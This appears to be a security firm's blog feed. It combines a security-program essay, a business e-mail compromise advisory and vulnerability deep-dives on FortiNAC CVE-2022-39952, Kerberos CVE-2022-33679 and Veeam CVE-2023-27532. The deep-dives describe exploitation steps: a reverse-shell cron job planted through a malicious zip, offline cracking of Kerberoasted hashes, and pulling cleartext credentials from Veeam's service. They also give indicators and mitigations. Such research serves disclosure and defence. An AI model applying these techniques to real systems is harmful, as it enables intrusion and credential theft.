Normal view

There are new articles available, click to refresh the page.

Journey to Secure

13 February 2023 at 22:02

This will be a series following my “journey to secure” since joining my organization. I want to preface that this is in no way a blueprint everyone can follow, but it is logic and items that I used to understand the business, current security state, and leadership visions for building an internal security program. Our job as security practitioners is to keep the needle moving forward by maturing security for an organization. The “journey to secure” never stops, and is crucially important in the highly interconnected digital age we live in.

The culture of the company dictates how easy this journey to secure can be, or the trials and tribulations you will face. The sad truth for the “blue team” about protecting your organization is your goal is 100% perfection. It’s an impossible task as no one is perfect. The flip side to this is the bad guys just have to be right once. The bad guys can have millions of failures and it is acceptable. That single attempt that worked for the bad guys and got through the perfect defense of the blue team is all that matters.

Understand that this is a journey. You won’t solve the world’s problems tomorrow. You need to be agile enough to respond to new threats, you need to have enough vision to plan out your journey and increase the security posture for your organization.

First 90 Days

DON’T MAKE CHANGES!!! This kills me every time I see people trying to implement or change a process almost immediately out of the gate when they join a company. In my experience, once you embark at a new company, you haven’t even been fully onboarded yet in your first 90 days. You don’t fully understand the company and what makes it tick. You don’t know how your change will affect the day-to-day work of users. In reality I’ve seen the average onboarding time for when people feel comfortable and know who to ask to get answers is about 6 months. You have to understand the current state and the environment. You need to LISTEN to your subordinates, peers, and leaders. You have to ABSORB this data and information so you can make tactical changes to actually improve a process or seal a gap. Am I saying don’t do anything at all during this time? No. You can plan and start laying out your roadmap and vision as you learn what’s currently in place as well as what’s missing. You need to identify gaps as well as enhancements that you can bring to the company to move the needle forward for security. You need to make sure that you’re doing meaningful security practices and not security theater that so many people are blinded with.

In my first 90 days, I listened to everyone I could have conversations with. I started to develop my “network” within the company so people would know who I am and what my visions and goals are. This allowed me to listen, absorb, and see what are the systemic issues currently being faced within the organization as well as the things that are being done really well already. This gave me credibility with the team to know that I’m here to help them and not be a burden. At the end of the day we are one team. We all work at the same company and want it to thrive and be successful. By ingraining myself into the team this gave me personal relationships so people understood who I am as a person, and that deep down I intend to do the right thing even if it’s not the popular thing. I realized this is a startup company, a highly specialized cybersecurity startup–so there are some very intelligent individuals within this organization who have been implementing security controls since the inception of it. I had 5,000,000 things going through my head for questions and I still do. What’s our attack surface? What are our biggest risks? What controls do we have in place? Are the policies and standards accurate? Are we doing what we are stating in our policies? I can go on and on with the amount of questions I had going through my head and asking teams to get data and notes. I asked questions, made notes, and devised a plan while being agile enough to be ready to swap what I thought was a priority to something else based on feedback or trends we were seeing that needed to be addressed. Always ask questions. The moment you stop asking questions is the moment you stop learning.

First 90 Done, What now?

From the first 90 days I saw a recurring trend coming from VRAs (Vendor Risk Assessments) from prospective clients, emails between teammates, and chat messages. We had variations of Phishing and Smishing attempts happening within the org. We had our annual Cybersecurity awareness training that met the checkbox for all regulatory requirements. Does meeting the checkbox for compliance mean that what you have in place is effective? No, it does not. We had a baseline that allowed us to meet regulatory compliance but everyone was not on the same page for what to do when they got phishing, smishing, or vishing attempts. The company didn’t have a repeatable process for users to follow in that situation. They didn’t know what to do. So I set out with a focus on the below (not in any specific order):

Journey to Secure: Security Goals

The security awareness training and process for handling phishing attempts needed to be improved. Based on the population size of the company this wouldn’t be a huge overhaul though it would be challenging, but would allow me to solve a systemic problem. Technical wouldn’t be the challenge here as there are a lot of solutions that provide simulated phishing and Security Awareness Training (SAT). The challenge with this program is the human aspect of it. We needed to change human behavior. We need to coach people on what to do and how to do it. So how do you achieve that change?

The first thing you need is to make sure you have leadership buy in. The leadership buy in allows them to go to bat for you and support the program when you have push back. Any one who has ever implemented any security solution will know there will always be pushback. So you need the leadership buy-in to have a leg to stand on for when the pushback happens.

For me it ended up being the perfect storm as I got lucky on the timing of everything. I paired the launch of our Phishing and SAT platform with Cybersecurity Awareness Month. This allowed me to pair the launch with frequent communication to the organization so they adopted instant familiarity with the platform. In preparation of the launch I created a SAT Policy that used a “rewards” based system. Those rewards were for successes as well as failures. Well how do you reward a failure? You reward it with training and education. Educating someone so we can be better as individuals is a great reward. For full transparency there are some negative rewards for failures as well, but I made sure when developing the phishing and SAT program I gave every opportunity to the users before those come to fruition.

I wanted basic repeatable metrics that clearly told the story that I was trying to tell, which at the end of the day metrics are just stories of what you’re telling. I decided to use the below as my quarterly reporting areas to show where we needed to educate the company.

  • Phishing
    • Some failure criteria metrics per a phishing campaign such as these
      • Clicked Links
      • Data Entered
      • Replied to
    • Success which in my mind is the more important metric out of all of these
      • Reported
  • Training
    • Completed percentage for a training campaigns

Outcome so far

Since the overhaul of the program this is what we are currently showing.

  • We are seeing increased conversations around phishing and security awareness training happening in our internal chat platform. This includes both good, bad, sarcastic, and indifferent conversations.
  • Showing a continual increase of users reporting phishing or suspicious emails via the phishing button that was implemented.
  • Security Awareness Training there was a large adoption rate for the security content and material.

Is what I implemented perfect? No, even though I would love to think that it is. Does it give us a foundation to improve from? Yes! Does it provide value? YES! Education is one of the strongest things you can do for users. Not only is this education intended for the users but it’s education for myself and the team on creating effective playbooks for handling situations and improving. This allows the most seasoned professional or the person fresh into the workforce getting their foot into cybersecurity to have the same response to the situation every time. We have built a SAT program to give monthly training modules to everyone. I now have the platform to iterate through the feedback that I’m getting from the user population to make things better. I can do this by driving our users towards not blindly clicking links, reporting something they and don’t assume someone else has, and raising our security awareness as we being cybersecurity professionals aren’t excluded from the lessons we preach. As I stated at the beginning of this, no one is perfect, but we can always strive to be better. That’s what I’m trying to achieve here. Make myself better a security practitioner and leader, but also make the company better via our security practices and a smiling face that is here to help anyone and everyone that I can.

Until the next time.

Stay vigilant.

The post Journey to Secure appeared first on

Fortinet FortiNAC CVE-2022-39952 Deep-Dive and IOCs

21 February 2023 at 12:40


On Thursday, 16 February 2023, Fortinet released a PSIRT that details CVE-2022-39952, a critical vulnerability affecting its FortiNAC product. This vulnerability, discovered by Gwendal Guégniaud of Fortinet, allows an unauthenticated attacker to write arbitrary files on the system and as a result obtain remote code execution in the context of the root user.

Extracting the System

Extracting the filesystems from the appliances is straightforward, first the mountable filesystem paths are listed from the vmdk:

sudo virt-filesystems --filesystems -a fortinac-

Next, we mount the filesystem to a directory we make:
sudo guestmount -a fortinac- -m /dev/centos/root --ro /tmp/fnac941

The Vulnerability

After extracting both filesystems from both the vulnerable and patched vmdk’s, it’s apparent that the file /bsc/campusMgr/ui/ROOT/configWizard/keyUpload.jsp was removed in the patch, and also matches the name of the servlet mentioned in the advisory.

Examining the contents of keyUpload.jsp, we see that the unauthenticated endpoint will parse requests that supply a file in the key parameter, and if found, write it to /bsc/campusMgr/config.applianceKey

After successfully writing the file, a call to Runtime().Exec() executes a bash script located at /bsc/campusMgr/bin/configApplianceXml

The bash script calls unzip on the file that was just written. Immediately, seeing this call on the attacker controlled file gave us flashbacks to a few recent vulnerabilities we’ve looked at that have abused archive unpacking. While our initial thoughts were around a directory traversal issue, unzip helpfully strips relative paths and protects against traversals.

The issue is actually much more simple and no traversal is needed. Just before the call to unzip, the bash script calls cd /. Unzip will allow placing files in any paths as long as they do not traverse above the current working directory. Because the working directory is /, the call unzip inside the bash script allows any arbitrary file to be written.

Weaponization of the Issue

Similar to the weaponization of previous archive vulnerability issues that allow arbitrary file write, we use this vulnerability to write a cron job to /etc/cron.d/payload. This cron job gets triggered every minute and initiates a reverse shell to the attacker.

We first create a zip that contains a file and specify the path we want it extracted. Then, we send the malicious zip file to the vulnerable endpoint in the key field. Within a minute, we get a reverse shell as the root user. Our proof of concept exploit automating this can this can be found on our GitHub.

Indicators of Compromise

Unfortunately, the FortiNAC appliance does not allow access to the GUI unless a license key has been added, so no native GUI logs were available to check for indicators. However, exploitation of the issue was observable in filesystem logs located at /bsc/logs/output.master. Specifically, you could check for the line Running configApplianceXml as long as the attacker has not cleared out this log file.

Arbitrary file write vulnerabilities can be abused in several ways to obtain remote code execution. In this case, we write a cron job to /etc/cron.d/, but attackers could also overwrite and binary on the system that is regularly executed or SSH keys to a user profile.

The post Fortinet FortiNAC CVE-2022-39952 Deep-Dive and IOCs appeared first on

From CVE-2022-33679 to Unauthenticated Kerberoasting

25 February 2023 at 22:29

On September 13, 2022, a new Kerberos vulnerability was published on the Microsoft Security Response Center’s security site.  It’s labeled as a Windows Kerberos Elevation of Privilege vulnerability and given the CVE ID CVE-2022-33679.  The MSRC page acknowledges James Forshaw of Google Project Zero for the disclosure and James published a detailed technical write-up of the vulnerability on Project Zero’s blog.  The attack targets Windows domain accounts that have pre-authentication disabled and it attempts an encryption downgrade attack.  A proof-of-concept (PoC) script was released by Bdenneu on Github that performs the attack and when successful, obtains a ticket-granting-service service ticket. In this post, we’re going to cover some high level Kerberos details, show how to exploit the vulnerability with the PoC and reveal how to extend this attack all the way to unauthenticated Kerberoasting.

In order to understand the vulnerability and what we’re doing later in this post, it’s useful to know what Kerberos is and how it works.  It is also important to understand how existing attacks like Kerberoasting and AS-REP Roasting work.  If you’re already familiar Kerberos and common attacks, feel free to skip this section.

What is Kerberos?

Kerberos is an authentication protocol that is used to verify the identity of a user or host.  The Windows Server operating systems implement Kerberos version 5 for public key authentication, transporting authorization data and delegation.  It is commonly used in Windows Active Directory domains and provides the following benefits:

  • Delegated authentication
  • Single sign on
  • Interoperability
  • More efficient authentication to servers
  • Mutual authentication

I’m going to focus on the Windows implementation of Kerberos 5 and how it’s used in an Active Directory domain.  The following describes some of the key components and services:

Key Distribution Center (KDC) – This is a service that usually runs on the Domain Controller and it interacts with other Windows Server security services.  The KDC provides two services: an authentication service and a ticket granting service.

The Kerberos authentication service is used by network clients to authenticate themselves to the domain and/or domain services.  Once a client has authenticated, the authentication service sends the client a Ticket-Granting-Ticket (TGT) to be used with the Ticket-Granting-Service.

The Ticket-Granting-Service (TGS) accepts and validates TGTs from clients and issues TGS service tickets to the clients.  TGS service tickets are provided to domain services by the clients to prove they are valid domain clients.

How does it work?

Kerberos authentication is based on the use of pre-shared keys.  The KDC has access to any client’s private key via the domain controller’s security services (in most cases the KDC runs on the domain controller).  The authentication process starts when a network client makes an authentication request (AS-REQ) to the KDC.  If pre-authentication is enabled, the KDC will send an authentication reply (AS-REP) with a failure message asking the client to send an encrypted timestamp as part of the next AS-REQ.  The timestamp is encrypted with the client’s password hash and sent to the KDC in a AS-REQ message.  Since the KDC has the client’s password hash from the domain controller it can decrypt the timestamp and verify that the timestamp is within a given time frame.  This is how the KDC verifies that the client is who it says it is.  The KDC responds to the client with an AS-REP that has an encrypted TGT and an encrypted client blob.  The client blob is encrypted with the client’s password hash so only the client can decrypt it.  This is how the client knows the TGT came from the KDC.  The encrypted client blob has details about the encrypted TGT as well as a session key that will be used in the next phase of authentication.  The encrypted TGT is encrypted with the KDC’s secret (password hash) so the client cannot decrypt it.  If pre-authentication is disabled, the KDC will respond without question to the initial AS-REQ and provide the encrypted TGT and session key.

Attackers note:  Having pre-authorization disabled is a dangerous misconfiguration.  Attackers can simply query the KDC for users with pre-authentication disabled and then request TGTs for each user.  Then the TGT can be dumped from memory and used offline in a brute force password cracking attack.  If the password is cracked, the attacker then has valid credentials for a domain user.  This kind of Kerberos attack is known as AS-REQ Roasting and is trivial to perform.  Pre-authentication should rarely be disabled and only in cases where it’s necessary for compatibility with legacy systems.  Any accounts that have it disabled should have passwords that are sufficiently long and complex to thwart any password cracking attempts.

The client next decrypts the client blob to get a session key and makes a TGS request (TGS-REQ) to the TGS.  The TGS-REQ includes the Service Principal Name (SPN) of the service it wants to access and preauth-data, which includes the encrypted TGT.  The TGS extracts the encrypted TGT and decrypts it.  Remember the TGS is just a service provided by the KDC and since the TGT is encrypted with the KDC’s secret, the TGS can decrypt it.  This is also how the TGS determines that the TGT is legitimate since only the KDC knows the secret.  Inside the TGT is a session key.  This session key is the same key that the client received in the AS-REP from the KDC.  The TGS prepares a TGS reply (TGS-REP) which includes a new service ticket (ST) which is encrypted with the SPN’s secret (password hash).  The TGS-REP is encrypted with the session key and sent back to the client.

The client decrypts the TGS-REP to get the encrypted ST and sends it to the desired service.  The service decrypts the ST with it’s secret and verifies the contents with the KDC.  Once verified, the service grants access to the requesting client and authentication is complete.

Attackers note:  If an attacker has valid domain credentials (user / password), they can attack the second phase of the Kerberos authentication process.  The attacker can use the credentials to request a valid TGT and then request ST for any domain services with a SPN tied to a user account.  Since the ST is encrypted with the service’s password hash, it can be dumped from memory and taken offline for a brute-force password cracking attack.  Any cracked passwords will give the attacker new credentials that enable lateral movement and possible privilege escalation since many services run with elevated privileges.  This attack is known as TGS-REP Roasting or more commonly as Kerberoasting.


Now that we have a baseline, let’s dive into CVE-2022-33679.  CVE-2022-33679 is similar to AS-REP Roasting in the sense that it works against accounts that have pre-authentication disabled and the attack is unauthenticated meaning we don’t need (nor do we have) a client’s password.  One detail of the initial client request (AS-REQ) for a TGT that I left out above, is how the encryption algorithm is chosen.  In the AS-REQ, the client will list encryption schemes that it wants to use.  The KDC will select a scheme to use and use it with the client’s secret to encrypt the session key in the AS-REP back to the client.  There are several schemes that can be chosen to include a few that shouldn’t be used due to being considered weak encryption schemes.  In this case, CVE-2022-33679 performs an encryption downgrade attack by forcing the KDC to use the RC4-MD4 algorithm and then brute forcing the session key from the AS-REP using a known plaintext attack.  The Project Zero blog post goes into great detail on the weaknesses of RC4-MD4 and how the brute force attack works so I won’t repeat it here.  Once the session key has been extracted you end up with the session key and a TGT…  the two things you need to make a TGS-REQ to the TGS for a ST. Pretty awesome right?


The PoC posted to Github performs the attack and obtains a ST for a given service.  It writes the ST out to a file in a credential cache (ccache) format.  This format, if you’re not familiar with it (which I wasn’t), is a Kerberos standard format for representing TGTs and STs and is detailed in the Kerberos documentation.  An interesting tidbit of information is that the Python Impacket library has several tools for interacting with Windows that accept credentials in ccache form.  Let’s take a look at the PoC in action and then use the credentials cache with crackmapexec to access a given server’s shared folders.

The required options for the PoC script are a target and a server name.  The target is a combination of the domain and a user account that has pre-authentication disabled.  The server name is the server you want to authenticate to.  In the example below, the domain is pod13.h3airange.internal, the user is jsmith2 and the server is the domain controller dc01.pod13.h3airange.internal.  As the screenshot shows, the PoC requests an AS-REQ and receives the AS-REP.  Then it brute forces the session key 1 byte at a time until it has all 5 bytes.  It uses the session key and the TGT to request a ST from the TGS and then writes it out to disk.  As a point of clarification, the script says that it receives a TGS and writes that to disk.  What it means is it receives a TGS service ticket, which I’ve been calling a ST.  That caused a bit of confusion for me initially which I’ll discuss in a bit below.  In order to use the credentials cache with crackmapexec, we’ll need to export an environment variable called KRB5CCNAME and set it to the ccache file created by the PoC.  We’ll need to provide crackmapexec with the -k flag which tells it to use the ccache file from the KRB5CCNAME environment variable.

Exploiting CVE-2022-33679 and using ccache to map shares

The Journey to Unauthenticated Kerberoasting

When I was tasked with adding CVE-2022-33679 to NodeZero, I knew very little about Kerberos.  I knew it was used for authentication in Windows Domains and I knew of Kerberoasting and Golden Tickets but nothing about how any of it worked.  At Horizon3, we pride ourselves in being “learn it alls”.  Meaning we don’t know everything but we’re willing and able to adapt and learn on the fly as needed.  I spent a few days reading up on Kerberos, everything from blog posts to the Kerberos standards documentation.  I dove into existing vulnerabilities like AS-REP Roasting, Kerberoasting, Golden Ticket, Silver Ticket and Pass the Ticket.  Once I felt I had a decent understanding of Kerberos and it’s existing weaknesses, I started to dig into the source code for the PoC and for Impacket’s tools like and  One thing I found consistently throughout the process was the terminology used for the different Kerberos stages and tickets wasn’t consistent from one place to the next.  This is why I clarified above about the type of ticket the PoC wrote to disk.

As I was developing a module to work with the PoC, something kept bothering me.  Not in a bad way, but it was a persistent feeling that there was more to this than just getting a service ticket.  I had a bunch of puzzle pieces from several different Kerberos attacks and it felt like they hadn’t been combined to completeness yet.  Initially, I chalked it up to having spent the previous days deep diving on Kerberos vulnerabilities and trying to keep them straight in my head but the more I worked on the module, the more it kept nagging.  Here’s the gist of what kept bouncing through my head:

  • This CVE is unauthenticated just like AS-REP Roasting.  A valid user account is not required.
  • After the exploit we have a TGT and a session key both of which are required for interacting with the TGS.
  • The TGT and session key are legitimate, just as if they were acquired with valid credentials.
  • Kerberoasting requires valid credentials for a domain user account to request STs for SPNs with user accounts.

The question was, could these pieces be combined to do unauthenticated Kerberoasting? The short answer is yes…

Initially I thought maybe I could write the TGT to disk as a ccache file and use it later.  This was early on when I still had a hard time keeping the different tickets and session keys straight.  In this case I was confusing the session key recovered by the PoC with the client’s secret used to encrypt the AS-REP.  I thought the recovered session key WAS the client’s password hash, not the session key used for communicating with the TGS.  I lost more time than I care to admit trying to write the TGT to a ccache file.  Impacket’s had everything that would be needed.  It has a GETTGT class with a saveTicket() function that takes a TGT and a session key (this is an example of where the terminology is confusing). saveTicket() creates a credential cache from the TGT and then saves it to a file.  Trying the TGT and a session key I had, just didn’t work.  I went back and re-read the Project Zero blog and started to look at what was the PoC was doing.  At some point I realized that the session key that saveTicket() wants is actually the client’s password hash, which to be fair is used as the session key between the client and the KDC initially but is rarely called a session key. Regardless, the TGT could not be written to a ccache file without the client’s password.

saveTicket function from

Even though saving the TGT to a ccache file wasn’t possible, I still felt like there was more that could be done.  I mean, I did have a valid TGT and session key after all.  The next thing needed was a list of the Service Principal Names running under a user account in the domain.  That shouldn’t be too hard as it is exactly what Impacket’s does.  Normally when Kerberoasting, we can use with the -request flag and valid credentials to get a list of SPNs and their hashes.  We don’t have the valid username & password or the NTLM hash required but we do have a ccache file from our service ticket.  It turns out can use a ccache file as credentials when passed as an environment variable.  Just use the -k and -no-pass flags and set the  KRB5CCNAME environment variable to the ccache file name.  Let’s give it a try. with credential cache

As you can see it works… sort of.  Bummer.  I thought I had connected all the dots but as the screenshot shows, only the SPNs get printed out. The hashes don’t.  It was at this point that I almost gave up.  Actually I did give up, for a while.  I quit for the day, defeated but with the intent on trying again the next day with fresh eyes.  However, getting so close and failing bugged me.  It bugged me a lot.  My brain cycled in an infinite loop, “Ok, you got the service names, now what?  What can you do with that?  You have a TGT and a session key and a ST and SPNs.  What can you do with those?”  Eventually the pieces came together and I thought of something I hadn’t tried.  Since I had a TGT and a session key which are used to request access to a service and I now had a list of services (SPNs) with user accounts, I should be able to create new TGS-REQs, one for each service, and send the requests to the TGS.  The TGS-REP returned would include a ST encrypted with the service’s secret (password hash) and I could dump those to crack offline.

With that idea, I made the following modifications to the original PoC.

  • Added support for a list of multiple users
  • Verified that the user has pre-authorization disabled
  • Used the ST ccache file to enumerate SPNs with
  • Used the TGT, session key & SPNs to Kerberoast the SPNs
  • Wrote the decoded ST to a file (along with additional data for each user)

Now when the script runs, it enumerates SPNs and dumps the krb5tgs hashes for an offline password cracking attack.  Here’s the output from a complete run of the final script.

Updated PoC to exploit CVE-2022-33679 and Kerberoast SPNs

Output of updated PoC

The Kerberoasted SPNs are in the section labeled KRBTGS in the screenshot.  There are two in this example and each begins with $krb5tgs.  If we copy them out as is and put them into a separate file, we can attempt to crack them with JohnTheRipper.

Cracking SPN password hashes with JohnTheRipper

You might be wondering why don’t we just access the services with the ST that is returned.  The answer lies in the fact that the KDC isn’t responsible for determining if a client is authorized to access a service.  It only authenticates a client to prove that it is a valid client and provides that validation to the service.  It’s up to the service to determine if the user is authorized to access it and to what extent.  The user in our example is jsmith2 and while it is a valid domain account, the account does not have permissions to access either of the services that we Kerberoast.


As bad as this could be, it’s fairly straightforward to mitigate.  The two things that make this attack possible are pre-authentication being disabled and the RC4-MD4 encryption scheme.  First, pre-authentication is enabled by default in Windows domains but is sometimes disabled for legacy systems or compatibility reasons.  It should only be disabled for a individual accounts.  Regular audits of domain accounts will identify any accounts that have pre-authentication disabled.  Make sure it is actually required.  Second, Microsoft has added a flag that disables the RC4-MD4 algorithm and while it’s recommended that RC4 be disabled, doing so can present it’s own set of problems.  A final option is enforcing Kerberos Armoring (FAST) on all clients and KDCs in the environment.  Whatever mitigations you put in place, make sure you trust but verify them.

The post From CVE-2022-33679 to Unauthenticated Kerberoasting appeared first on

Proactive Risk Partners with to Bring Clients a Comprehensive Risk Management Solution

7 February 2023 at 00:46

Businesswire 02/07/2023

Proactive Risk, a leading provider of technology risk management solutions, is excited to announce that it has joined the Partner Program as an Authorized Service Provider.

Read the entire article here

The post Proactive Risk Partners with to Bring Clients a Comprehensive Risk Management Solution appeared first on

Silicon Valley Bank (SVB) Failure Could Signal a Rise in Business E-mail Compromise (BEC)

15 March 2023 at 16:08

On 10 March, Silicon Valley Bank (SVB) – a popular institution for the venture capital community in the Bay area – failed when venture capitalists (VCs) quickly started to pull money out of the 40-year-old bank, causing federal regulators to step in and shut its doors before more damage could be done. As investors and CEOs scramble to make sense of the situation, many are looking for alternative locations to store and manage their personal and company’s money ASAP. We understand that in this pressure-filled moment, many will likely take shortcuts and quickly share sensitive information on unsecured platforms, leaving malicious threat actors to take advantage through techniques like business e-mail compromise (BEC).

Currently, vendors are rushing to set up new accounts to switch payments to and scrambling to update ALL payment details for their customers so that new receivables are being sent to their new bank account versus their now defunct SVB account. These account details are being sent unsecurely over e-mail and as attached PDF’s, and the recipients are operating with urgency to get money transferred ASAP. Due to this emergency, customers are transferring substantial amounts of money into these new accounts, leaving both company and customer vulnerable to malicious activity during the process. These are the perfect conditions for threat actors to steal several million dollars (and perhaps much more!).

What is Business E-mail Compromise (BEC)?

Threat actors commonly leverage e-mail access to conduct business accounting fraud, conduct highly targeted phishing attacks, gain access to sensitive information, and elicit trusting coworkers to perform actions on their behalf. BEC is a scam targeting both businesses and individuals performing transfers of funds, according to the US Federal Bureau of Investigation (FBI). It is commonly carried out when a threat actor compromises legitimate business e-mail accounts through social engineering or computer intrusion tactics, techniques, and procedures (TTPs) to conduct unauthorized transfers of funds. In 2021 alone, BEC scams resulted in nearly 20,000 complaints and a loss of $2.4 billion. For example, threat actors have targeted the mortgage industry, specifically targeting the home buying/refinancing workflows whose employees use e-mail for nearly all transactions, usually overworked, and under trained in cybersecurity issues such as BEC.

Types of Business E-mail Compromise Scams

  1. Data Theft – threat actors target the HR department and steal company information.
  2. CEO Fraud – threat actors spoof or hack into a CEO’s e-mail account, then e-mail employees instructions to make a purchase or send money.
  3. Account Compromise – threat actors use phishing or malware to get access to a finance employee’s e-mail account. Then the scammer e-mails the company’s suppliers fake invoices that request payment to a fraudulent account.
  4. False Invoice Scheme – threat actors may pose as a legitimate vendor and will send a fake invoice to be paid.
  5. Lawyer Impersonation – threat actors gain unauthorized access to an e-mail account at a law firm. Then they e-mail clients an invoice or link to pay online.

In addition to social engineering TTPs, threat actors can also use legitimate credentials to access business e-mail within an organization to impersonate targets and garner sensitive information over unsecure/unencrypted e-mail correspondence.

We know that threat actors exploit credential requirements in many ways; they can:

  • Take advantage of weak password strength requirements or weak account lockout thresholds
  • Capture and then crack hashes
  • Take advantage of accounts that reuse compromised credentials
  • Use the default credentials that remain unchanged in a variety of web applications and systems processes

Threat actors do not often use sophisticated hacking tools and techniques to gain access to business e-mail and networks; along with social engineering techniques, threat actors don’t “hack” in, they log in with legitimate user credentials.

How does BEC work?

BEC allows threat actors to read, send, and receive e-mails under the guise of that user or many users at once. Threat actors frequently seek out their targets through open-source research like a company website or professional social media platforms such as LinkedIn to figure out whose identity they can use in the scam. Once the threat actor gains initial access, they will seek to determine their target based on who is able to send and/or receive money (Threat actors generally seek and target a junior employee who’s responsible for inputting the numbers into a bank’s portal). In a subsequent e-mail conversation, the threat actor will impersonate one of the parties by spoofing the e-mail domain and then try to solicit their target’s trust and ask them to send money, gift cards, or information. These e-mails usually contain an attached PDF with wire instructions and are often proceeded by a follow-up e-mail that says, “Sorry, use these account and routing numbers instead.”

Targets of BEC

  1. Executives and leaders – details of these individuals are generally available on the company website.
  2. Finance employees – these individuals have banking details, payment methods and account numbers readily available and are prime targets.
  3. HR managers – these individuals typically retain sensitive employee data like social security numbers, tax statements, and contact information.
  4. New or entry-level employees – typically these individuals will not be able to verify an e-mail’s legitimacy with the sender.

Why does this matter?

For all intents and purposes, a threat actor using credentials looks like a legitimate user. Coupled with the absence of malware, this type of attack is extremely difficult to detect.

Over the past 6 months, only 2.5% of customers experienced BEC in their environment with proof of exploitation. However, NodeZero successfully executed credential-based attacks over 6,000 times (out of the 34,000 times in which NodeZero successfully executed an attack compromising at least one host), and to significant effect. For more detail and recommendations regarding credential-based attacks, please see our Year in Review 2022 report.

For example, NodeZero was also able to execute a BEC on a large US based security systems provider by successfully chaining the following weaknesses together (See NodeZero’s attack path below):

  • Credential Dumping of Security Account Manager (SAM) Database and Local Security Authority (LSA) Secrets
  • Azure Multi-Factor Authentication Disabled
  • Credential Reuse and cracked Weak or Default Credentials

In this case, NodeZero found that this privileged user had the same credentials for local admin and domain user on the company’s Azure account, and from the domain user account was able to pivot laterally for further access. MFA was not enabled, so NodeZero proceeded to gain access into their Azure cloud environment and then get into Outlook. With this valid domain account, NodeZero accessed 25 business e-mails, and as proof, NodeZero showed the customer the subject lines of the e-mails it was able to access.

From here, an attacker could login legitimately as a company employee, create an email, and send it to the customer base, and in the case of a banking collapse or change of accounting, could direct the customer to change their invoicing and remit payments for vendor services to the attacker’s personal account. Both the company and the customer lose money and trust.

What can we do about it? recommends:

  • Require the use of multifactor authentication for logging into external environments and segmented networks when possible.
    • If you’re using Azure AD, you can enable Azure AD Password Protection to automatically ban well-known bad passwords.
  • Assess and analyze your employee’s passwords to ensure they meet your minimum requirements
    • Institute password policies that include sophistication and length requirements as described in the latest recommendations from NIST Special Publication 800-63B. NOTE: Horizon3 recommends a 12-character (min) for users and more for privileged users, just as several other companies do.
    • When creating a temporary password for a new user or a user that requires an account unlock, require the password to be used within a specific timeframe before the account becomes disabled.
    • Do NOT allow passwords that have been in previous breaches, are contextually based on the company name, their personal name or login, or their role
    • Implement a configuration management process that directs default credentials (including and especially empty, null, or “guest” defaults) are changed before systems are deployed in a production environment.
  • Implement good access controls to include the principle of “least privilege.”
  • Disable the accounts of current or former employees who no longer require access.
  • Always, verify that each of the above guidelines are implemented, enforced, and effective by attacking your teams, tools, and rules using NodeZero.
  • And lastly, increase training for employees on basic cyber security, including the dangers of credential reuse and weak or easily guessed passwords and social engineering TTPs to look out for and avoid.
  • The post Silicon Valley Bank (SVB) Failure Could Signal a Rise in Business E-mail Compromise (BEC) appeared first on’s NodeZero™ Analytics Unleashes and Extends the Power of NodeZero’s Advanced Pentesting and Analysis

14 March 2023 at 19:09

Businesswire 03/14/2023, a leading cybersecurity firm specializing in autonomous penetration testing, today launched a major product refresh, doubling down on its commitment to help organizations continuously verify their security posture.

Read the entire article here

The post’s NodeZero™ Analytics Unleashes and Extends the Power of NodeZero’s Advanced Pentesting and Analysis appeared first on

Veeam Backup and Replication CVE-2023-27532 Deep Dive

23 March 2023 at 12:15


Veeam has recently released an advisory for CVE-2023-27532 for Veeam Backup and Replication which allows an unauthenticated user with access to the Veeam backup service (TCP 9401 by default) to request cleartext credentials. Others, including Huntress, Y4er, and CODE WHITE , have provided insight into this vulnerability. In this post, we hope to offer additional insights and release our POC (found here) which is built on .NET Core and capable of running on Linux.

Examining the Vulnerable Port

We first determine what application is using vulnerable port 9401.

Find application using port 9401

Find application using port 9401

Now we can begin to reverse engineer the Veeam Backup Service. By default, we find the service binary and its associated assemblies in C:\Program Files\Veeam\Backup and Replication\Backup. The log file for the backup service is located at  C:\ProgramData\Veeam\Backup\Svc_VeeamBackup.log. Searching for the port in question in the log file gives a string that we can search for in the binary.

Find port in log file

Find port in log file



Next we dig into the call to CreateService and eventually find ourselves at a private constructor for CRemoteInvokeServiceHolder:



The use of ServiceHost, NetTcpBinding, and AddServiceEndpoint gives us enough context to know that this app is hosting a Windows Communication Foundation (WCF) service. The services exposes the IRemoteInvokeService interface to the client and the interface is implemented by CVbRestoreServiceStub on the server side.

The use of NetTcpBinding tells us that this service is using a binary protocol built on TCP intended for WCF to WCF communication. This restricts our client implementation to a .NET language as it would be rather difficult to write a custom WCF binary parser. We do not want our POC to be restricted to running on Windows so we will use .NET core for our POC.

Constructing a WCF Client

Before we are able to create a client, we need the service interface definition. Based on previous research, we know that we need a few credential based methods from the DatabaseManager scope. We end up with the following definition:

Now we can try to connect to the service:

Our first attempt is met with the following error:

/home/dev/RiderProjects/Veeam_CVE-2023-27532/CVE-2023-27532/bin/Debug/net6.0/CVE-2023-27532 net.tcp://
Unhandled exception. System.ServiceModel.ProtocolException: The requested upgrade is not supported by 'net.tcp://'. This could be due to mismatched bindings (for example security enabled on the client and not on the server).

If we look back at CRemoteInvokeServiceHolder, we see that the NetTcpBinding was created with parameter "invokeServiceBinding". We can find the configuration parameters for this binding in Veeam.Backup.Service.exe.config:



With this information, we can update our POC. After disabling certificate validation and setting the correct DNSIdentity, we have the following:

Running the POC we get:

/home/dev/RiderProjects/Veeam_CVE-2023-27532/CVE-2023-27532/bin/Debug/net6.0/CVE-2023-27532 net.tcp://
Unhandled exception. System.ServiceModel.FaultException: Data at the root level is invalid. Line 1, position 1.

This indicates that we were able to successfully invoke the service. The error is a result of us passing invalid XML. Now we can begin to figure out how to extract credentials from this API.

Extracting Credentials

Based on previous research, we know that we can invoke CredentialsDbScopeGetAllCreds to get a binary blob containing credential information. If we look at the implementation of ExecuteCredentialsDbScopeGetAllCreds we see that this blob is a serialized C# object created by Veeam’s custom CProxyBinaryFormatter.



If we dump this data to a file we can see that there is username and password information, but it is not immediately obvious how to parse this information out of the binary blob. We don’t want to reimplement Veeam’s custom serialization class and also don’t want to have to reference their assemblies. So what can we do? It looks like there are some easily parseable guids prefixed by $.

CredentialsDbScopeGetAllCreds output

CredentialsDbScopeGetAllCreds output

We see that these guids match the id used for Credentials in the Veeam database:

Credentials in Veeam database

Credentials in Veeam database

We can now use the CredentialsDbScopeFindCredentials endpoint to get one credential at a time. Our code to extract the guids looks like:

The output from CredentialsDbScopeFindCredentials is still a binary blob, but at least we can work with one Credential at a time now instead of a list. We still have the problem of having to parse out the usernames and passwords. Luckily, we found a Stackoverflow post detailing how to use a custom serializer to get object properties as key value pairs. We can now extract the usernames an passwords with ease.

